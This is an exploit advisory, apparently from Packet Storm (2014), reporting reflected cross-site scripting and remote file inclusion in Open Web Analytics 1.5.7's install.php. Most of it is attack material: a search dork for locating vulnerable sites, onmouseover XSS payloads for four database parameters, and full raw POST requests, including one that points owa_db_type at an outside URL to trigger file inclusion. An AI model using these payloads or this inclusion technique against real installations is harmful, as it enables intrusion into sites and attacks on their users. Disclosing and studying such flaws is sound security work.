Open Web Analytics 1.5.7 Cross Site Scripting / Remote File Inclusion

2014-07-16T00:00:00
ID PACKETSTORM:127488
Type packetstorm
Reporter Govind Singh
Modified 2014-07-16T00:00:00

Description

                                        
                                            `##################################################################################################  
#  
#Exploit Title : Open Web Analytics - v: 1.5.7 multiple vulnerability   
#Author : Govind Singh aka NullPort  
#Vendor : http://www.openwebanalytics.com/  
#Download Link : http://downloads.openwebanalytics.com/  
#Google Dork : "powered by Open Web Analytics"   
#Date : 14/07/2014  
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )  
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi  
#Greez to : All IHT Members   
#   
###################################################################################################  
  
about vendor :  
-+-+-+-+-+-+-+-+-+-+-+-+-+  
Open Web Analytics (OWA) is open source web analytics software that you can use to track and analyze how people use your websites and applications.   
OWA also comes with built-in support for tracking websites made with popular content management frameworks such as WordPress and MediaWiki.  
  
1.) Reflected Xss   
  
Reflected Cross-Site Scripting in "install.php" in parameter "owa_db_host" "owa_db_name" "owa_db_password" "owa_db_user"   
  
PoC :   
  
owa_db_host=   
payload :: 127" onmouseover=prompt(901496) bad="  
+++++++++++++++++++++++++++++++++++++++++++++++  
owa_db_name=   
payload :: indiancrew" onmouseover=prompt(979236) bad="  
+++++++++++++++++++++++++++++++++++++++++++++++  
owa_db_password   
payload : 1ND14NH4X0R5T34M" onmouseover=prompt(911667) bad="  
+++++++++++++++++++++++++++++++++++++++++++++++  
owa_db_user  
payload : 1" onmouseover=prompt(925045) bad="  
+++++++++++++++++++++++++++++++++++++++++++++++  
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/owa/install.php?owa_action=base.installCheckEnv  
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=256  
POSTDATA=owa_public_url=http%3A%2F%2Flocalhost%2Fowa%2F&owa_db_type=mysql&owa_db_host=127" onmouseover=prompt(901496) bad="&owa_db_name=null&owa_db_user=nullport&owa_db_password=IndianCrew&owa_nonce=f6466bb4c4&owa_action=base.installConfig&owa_save_button=Continue...  
---------------------------------------------------------------------------------------------------------  
  
2.) Remote File Inclusion  
  
PoC :  
"install.php" file inclusion when URL encoded POST input "owa_db_type" was set to https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-xpa1/t1.0-9/1098413_154775491385294_984206350_n.jpg  
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/owa/install.php?owa_action=base.installCheckEnv  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=321  
POSTDATA=owa_public_url=http%3A%2F%2Flocalhost%2Fowa%2F&owa_db_type=https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-xpa1/t1.0-9/1098413_154775491385294_984206350_n.jpg&owa_db_host=localhost&owa_db_name=owa&owa_db_user=Null&owa_db_password=IndianCrew&owa_nonce=64a1c7957f&owa_action=base.installConfig&owa_save_button=Continue...  
  
PoC imz :: http://i59.tinypic.com/2q00hgi.jpg  
`